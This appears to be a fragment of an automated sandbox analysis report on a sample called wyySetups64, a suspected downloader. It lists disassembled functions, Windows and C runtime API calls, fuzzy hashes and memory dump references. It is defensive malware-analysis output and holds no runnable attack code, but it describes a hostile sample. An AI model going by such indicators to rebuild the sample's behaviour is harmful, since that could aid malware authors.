                                                                                                                                                                                                              • API ID: Message$Window$ClassCreateDispatchFolderFreeHandleKnownModulePathRegisterShowTaskTranslate
                                                                                                                                                                                                              • String ID: URLDownloader
                                                                                                                                                                                                              • API String ID: 1820083345-1891997712
                                                                                                                                                                                                              • Opcode ID: ad90597b90d91a76d6bc916b8ac211ae3b74ff0302ccb105c1be54824f9a3ca4
                                                                                                                                                                                                              • Instruction ID: 087d34f99c958e48c5109b8a3ae454b837f23f7b11dd3f31f5e86199cdc8dbc7
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ad90597b90d91a76d6bc916b8ac211ae3b74ff0302ccb105c1be54824f9a3ca4
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0A5109B1D00258AFDB14DFA8CC45BEEBBB4FF59300F108169E919A7290EB755A48CF61
                                                                                                                                                                                                              Function 10010CB7 Relevance: 13.6, APIs: 9, Instructions: 135COMMONLIBRARYCODE
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __RTC_Initialize.LIBCMT ref: 10010CFE
                                                                                                                                                                                                              • ___scrt_uninitialize_crt.LIBCMT ref: 10010D18
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1818941367.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1818922223.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1818999903.0000000010012000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1819028442.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1819047745.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Initialize___scrt_uninitialize_crt
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2442719207-0
                                                                                                                                                                                                              • Opcode ID: 649f4d9b7be6ac56b36da947fabe160b4803ea2d6c825da84b9566d7c5061089
                                                                                                                                                                                                              • Instruction ID: 82a901a5c9dd6496ef150d4dfe0cb85e0fd21509eb0d390bdb30e226946f8a75
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 649f4d9b7be6ac56b36da947fabe160b4803ea2d6c825da84b9566d7c5061089
                                                                                                                                                                                                              • Instruction Fuzzy Hash: CD41BF76F00269EBDB20CF95DC41BAE3AB5FB40AA4F114919F8956F251C7B0ED818BD0
                                                                                                                                                                                                              Function 00D51147 Relevance: 13.6, APIs: 9, Instructions: 87librarywindowloaderCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • LoadLibraryW.KERNEL32(10012398), ref: 00D51152
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,100123AC), ref: 00D51164
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,100123C0), ref: 00D51178
                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(00000000), ref: 00D511D4
                                                                                                                                                                                                              • RegisterClassW.USER32(?), ref: 00D511E8
                                                                                                                                                                                                              • CreateWindowExW.USER32(00000000,100123D8,100123EC,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00D5120D
                                                                                                                                                                                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00D51228
                                                                                                                                                                                                              • TranslateMessage.USER32(?), ref: 00D51236
                                                                                                                                                                                                              • DispatchMessageW.USER32(?), ref: 00D51240
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1816336980.0000000000D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_d50000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Message$AddressProc$ClassCreateDispatchHandleLibraryLoadModuleRegisterTranslateWindow
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3658383123-0
                                                                                                                                                                                                              • Opcode ID: 242d59c1bcc2ed5713fb3f605fd77491e9c67476cdc2317376c21f7694c6bbad
                                                                                                                                                                                                              • Instruction ID: c9d5589aeea263cbb16c356da2d834899cf373036a9ac9fe70c4cce0f739ed01
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 242d59c1bcc2ed5713fb3f605fd77491e9c67476cdc2317376c21f7694c6bbad
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 03310BB4D40318AFEB14DFD5CC89BADBBB4FF48701F108119FA0AA6290D7749694CB10
                                                                                                                                                                                                              Function 1000B4A0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 160COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • ?pptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 1000B4D7
                                                                                                                                                                                                              • ?pptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 1000B4E4
                                                                                                                                                                                                              • ?epptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 1000B4EF
                                                                                                                                                                                                              • ?_Pninc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEPADXZ.MSVCP140 ref: 1000B50B
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1818941367.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1818922223.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1818999903.0000000010012000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1819028442.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1819047745.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: D@std@@@std@@U?$char_traits@$?pptr@?$basic_streambuf@$?epptr@?$basic_streambuf@Pninc@?$basic_streambuf@
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1504536088-3916222277
                                                                                                                                                                                                              • Opcode ID: bf89f8f8861aed1ab7b692ef0b5d7095335db410b563b161b5768633909dd48d
                                                                                                                                                                                                              • Instruction ID: 9fd4f056ea7531655faf49f776dc9014e5164f0190cfa771b6f3da1c1fb63bf9
                                                                                                                                                                                                              • Opcode Fuzzy Hash: bf89f8f8861aed1ab7b692ef0b5d7095335db410b563b161b5768633909dd48d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 085173B5D00609EFEB05CFD4C885EEEBBB5EF04381F048199E901A7259DB35AE44CBA1
                                                                                                                                                                                                              Function 1000B020 Relevance: 10.7, APIs: 7, Instructions: 190COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 1000B042
                                                                                                                                                                                                              • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 1000B04F
                                                                                                                                                                                                              • ?egptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 1000B05A
                                                                                                                                                                                                              • ?_Gninc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEPADXZ.MSVCP140 ref: 1000B067
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1818941367.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1818922223.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1818999903.0000000010012000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1819028442.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1819047745.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: D@std@@@std@@U?$char_traits@$?gptr@?$basic_streambuf@$?egptr@?$basic_streambuf@Gninc@?$basic_streambuf@
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 623893373-0
                                                                                                                                                                                                              • Opcode ID: 686d5d765f072bde6da808c523b0d64b58909c4bdd405a7af84071ee35900531
                                                                                                                                                                                                              • Instruction ID: 8fa48943700a81e2c9b2cfce0a1ddd9ba30b149aeda4daa259b851e8e9bcb32b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 686d5d765f072bde6da808c523b0d64b58909c4bdd405a7af84071ee35900531
                                                                                                                                                                                                              • Instruction Fuzzy Hash: DE7138B5C0061DDFEB15DFA4C995AEEB7B5FF08290F104229E416B7299EB306E04CB91
                                                                                                                                                                                                              Function 1000AEB0 Relevance: 10.6, APIs: 7, Instructions: 124COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • ?xsgetn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MAE_JPAD_J@Z.MSVCP140(?,?,00000000), ref: 1000AEE8
                                                                                                                                                                                                              • ?_Gnavail@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBE_JXZ.MSVCP140 ref: 1000AF08
                                                                                                                                                                                                              • _Min_value.LIBCPMTD ref: 1000AF1F
                                                                                                                                                                                                              • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140(?), ref: 1000AF33
                                                                                                                                                                                                              • ?gbump@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEXH@Z.MSVCP140(?), ref: 1000AF5F
                                                                                                                                                                                                              • fread.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000FFF,00000000), ref: 1000AF9D
                                                                                                                                                                                                              • fread.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,00000000), ref: 1000AFEE
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1818941367.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1818922223.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1818999903.0000000010012000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1819028442.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1819047745.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: D@std@@@std@@U?$char_traits@$fread$?gbump@?$basic_streambuf@?gptr@?$basic_streambuf@?xsgetn@?$basic_streambuf@Gnavail@?$basic_streambuf@Min_value
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1591557727-0
                                                                                                                                                                                                              • Opcode ID: 05a9cec6a7bdc9e916f7dfb027493f280f4e908c6d3ff45262789d5ffb131775
                                                                                                                                                                                                              • Instruction ID: a7373feddb38768cb8e80fdeb6ca424b68bff663277300cca749af404b47d492
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 05a9cec6a7bdc9e916f7dfb027493f280f4e908c6d3ff45262789d5ffb131775
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1551D8B5E00209EFDB04DFA8C984AEEBBB1FF48344F108169E915A7354D730AE95DB50
                                                                                                                                                                                                              Function 10010D65 Relevance: 10.6, APIs: 7, Instructions: 87COMMONLIBRARYCODE
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1818941367.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1818922223.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1818999903.0000000010012000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1819028442.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1819047745.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: dllmain_raw$Main@12dllmain_crt_dispatch
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3353612457-0
                                                                                                                                                                                                              • Opcode ID: 51ffbf4d7ebe4a4557a9ec6990cc1df8eb7d6e0f0daaa4ef435442b776e98115
                                                                                                                                                                                                              • Instruction ID: 64606688521fabd1402afb0874e896261f6c1f2fbb559040e4c03d6bc464acc4
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 51ffbf4d7ebe4a4557a9ec6990cc1df8eb7d6e0f0daaa4ef435442b776e98115
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D0216B76F00269EEDB21CF56DC41AAF3AA9EB80AD4F014919F8945F210C7B0DD918BE0
                                                                                                                                                                                                              Function 1000B350 Relevance: 9.1, APIs: 6, Instructions: 106COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 1000B35D
                                                                                                                                                                                                              • ?eback@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 1000B36E
                                                                                                                                                                                                              • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 1000B379
                                                                                                                                                                                                              • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140(?), ref: 1000B3A3
                                                                                                                                                                                                              • ?_Gndec@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEPADXZ.MSVCP140 ref: 1000B3D3
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1818941367.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1818922223.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1818999903.0000000010012000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1819028442.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1819047745.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: D@std@@@std@@U?$char_traits@$?gptr@?$basic_streambuf@$?eback@?$basic_streambuf@Gndec@?$basic_streambuf@
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 4206206407-0
                                                                                                                                                                                                              • Opcode ID: a80ac29afee63ac313f60e84a30f3a0ede3531dd630a483fc897834597ea8dcd
                                                                                                                                                                                                              • Instruction ID: f7c15c91105892140f05b25e0fcfcadb8d2072b0e91d30d5794a3d544de0fed2
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a80ac29afee63ac313f60e84a30f3a0ede3531dd630a483fc897834597ea8dcd
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6E31CEB9D00208ABEB04DFA4D8959AE7B75EF442C0F04C469F8059B24BEB31EE45CB51
                                                                                                                                                                                                              Function 1000BEC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 59COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 1000CAC0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP140(?,1000BEEA,1000CEAD,1000CEAD,0Gl), ref: 1000CAE4
                                                                                                                                                                                                              • ?good@ios_base@std@@QBE_NXZ.MSVCP140(1000CEAD,1000CEAD), ref: 1000BEFC
                                                                                                                                                                                                              • ?tie@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_ostream@DU?$char_traits@D@std@@@2@XZ.MSVCP140 ref: 1000BF1D
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1818941367.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1818922223.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1818999903.0000000010012000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1819028442.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1819047745.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: U?$char_traits@$D@std@@@2@D@std@@@std@@$?good@ios_base@std@@?rdbuf@?$basic_ios@?tie@?$basic_ios@V?$basic_ostream@V?$basic_streambuf@
                                                                                                                                                                                                              • String ID: 0Gl
                                                                                                                                                                                                              • API String ID: 3792166412-169490322
                                                                                                                                                                                                              • Opcode ID: ae12adcc2c32b88dafc5603b844eb9ac3b5d40635a87f722cfffed01479731d9
                                                                                                                                                                                                              • Instruction ID: 6403fa240c7e006dd5772fa615f9af8d9caa538eb968de4636cddec1bc8cd2ef
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ae12adcc2c32b88dafc5603b844eb9ac3b5d40635a87f722cfffed01479731d9
                                                                                                                                                                                                              • Instruction Fuzzy Hash: EF216D7460064AEFD704CF54C984BAEBBB1FF49344F14C269E8165B391C730E940CB91
                                                                                                                                                                                                              Function 1000AD90 Relevance: 7.6, APIs: 5, Instructions: 100fileCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • ?xsputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MAE_JPBD_J@Z.MSVCP140(?,?,?), ref: 1000ADB1
                                                                                                                                                                                                              • ?_Pnavail@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBE_JXZ.MSVCP140 ref: 1000ADCB
                                                                                                                                                                                                              • ?pptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140(00000000,?), ref: 1000AE1C
                                                                                                                                                                                                              • ?pbump@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEXH@Z.MSVCP140(?), ref: 1000AE4D
                                                                                                                                                                                                              • fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,00000000), ref: 1000AE7C
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1818941367.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1818922223.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1818999903.0000000010012000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1819028442.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1819047745.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: D@std@@@std@@U?$char_traits@$?pbump@?$basic_streambuf@?pptr@?$basic_streambuf@?xsputn@?$basic_streambuf@Pnavail@?$basic_streambuf@fwrite
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1074265955-0
                                                                                                                                                                                                              • Opcode ID: 03ae3c2052802fc7122480744b0963d50f24e8686e0047993b433f27272eacd6
                                                                                                                                                                                                              • Instruction ID: ac6967b09ea6245ec4af0dc33b80ef160fb563bc847464cada0f3494a0eb2000
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 03ae3c2052802fc7122480744b0963d50f24e8686e0047993b433f27272eacd6
                                                                                                                                                                                                              • Instruction Fuzzy Hash: EB41E375D00289EFEB08DF98C884A9EB7B1FF88344F10C659E9299B254D730AE94CF50
                                                                                                                                                                                                              Function 10004020 Relevance: 7.6, APIs: 5, Instructions: 94COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,?,?,?,?,?,00000000), ref: 10004037
                                                                                                                                                                                                              • memset.VCRUNTIME140(?,00000000,?), ref: 10004074
                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,?), ref: 10004091
                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 100040A9
                                                                                                                                                                                                              • memset.VCRUNTIME140(?,00000000,?), ref: 100040D7
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1818941367.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1818922223.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1818999903.0000000010012000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1819028442.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1819047745.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ByteCharMultiWide$memset
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1216362210-0
                                                                                                                                                                                                              • Opcode ID: d8278ef5e5963c6c9a9663513e54bc5aa314779fc6fd0523c811705f5206c5ec
                                                                                                                                                                                                              • Instruction ID: d5d2fc12e147d12df5ef18d66f66630be37a1d65e2a688cbbcfc70e5b1a43c84
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d8278ef5e5963c6c9a9663513e54bc5aa314779fc6fd0523c811705f5206c5ec
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2D3152B5F40208BFEB14DF98CC86FAEB7B5EB48710F204254F615AB2C1D671AA50CB65
                                                                                                                                                                                                              Function 00D60D3C Relevance: 7.6, APIs: 5, Instructions: 87COMMONLIBRARYCODE
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1816336980.0000000000D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_d50000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: dllmain_raw$Main@12
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2964726511-0
                                                                                                                                                                                                              • Opcode ID: f7f534ad3ff482a18bf34d6bcd0cd3489ad4272e78613ad43f56d35246dc062b
                                                                                                                                                                                                              • Instruction ID: 73da00bd0c64a5ef642172904fbafdee2b0d63e79866cc379f48f122d4946d89
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f7f534ad3ff482a18bf34d6bcd0cd3489ad4272e78613ad43f56d35246dc062b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2B21AE72D00669ABCF219E55CC41E6F3E69EB84B94B094619F8086B611D7329D42CFB0
                                                                                                                                                                                                              Function 100107D5 Relevance: 7.5, APIs: 5, Instructions: 38COMMONLIBRARYCODE
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _callnewh.API-MS-WIN-CRT-HEAP-L1-1-0(00001000,?,1000152C,00001000,?,10003C5D,00001000), ref: 100107DD
                                                                                                                                                                                                              • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00001000,?,1000152C,00001000,?,10003C5D,00001000), ref: 100107EA
                                                                                                                                                                                                              • _CxxThrowException.VCRUNTIME140(?,10014F2C), ref: 10010EED
                                                                                                                                                                                                              • stdext::threads::lock_error::lock_error.LIBCPMTD ref: 10010EFC
                                                                                                                                                                                                              • _CxxThrowException.VCRUNTIME140(?,10014F90), ref: 10010F0A
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1818941367.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1818922223.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1818999903.0000000010012000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1819028442.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000000.00000002.1819047745.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ExceptionThrow$_callnewhmallocstdext::threads::lock_error::lock_error
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1722040371-0
                                                                                                                                                                                                              • Opcode ID: 046d961c1e0df506dca93b3cd0f00a3e9d42ff5419843ba781d4adb65e5c8679
                                                                                                                                                                                                              • Instruction ID: 6d4aa4042b719817879ad19d1f1f5d821abcde10b660f97fd496c7bb52ecdeee
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 046d961c1e0df506dca93b3cd0f00a3e9d42ff5419843ba781d4adb65e5c8679
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E8F0BE38D0420DBACB04EAB5EC469DEB7ACEF00290F104530B964AD4E1EFB1F6D58A95
                                                                                                                                                                                                              Function 10010720 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 23COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • AcquireSRWLockExclusive.KERNEL32(100172D4,URLDownloader,?,100017A9,100176B8,?,?,?,?,?,?,100019DB,10017674,00C40000,80000000,80000000), ref: 1001072A
                                                                                                                                                                                                              • ReleaseSRWLockExclusive.KERNEL32(100172D4,?,100017A9,100176B8,?,?,?,?,?,?,100019DB,10017674,00C40000,80000000,80000000,00000190), ref: 1001075D
                                                                                                                                                                                                              • WakeAllConditionVariable.KERNEL32(100172D0,?,100017A9,100176B8,?,?,?,?,?,?,100019DB,10017674,00C40000,80000000,80000000,00000190), ref: 10010768
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1818941367.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
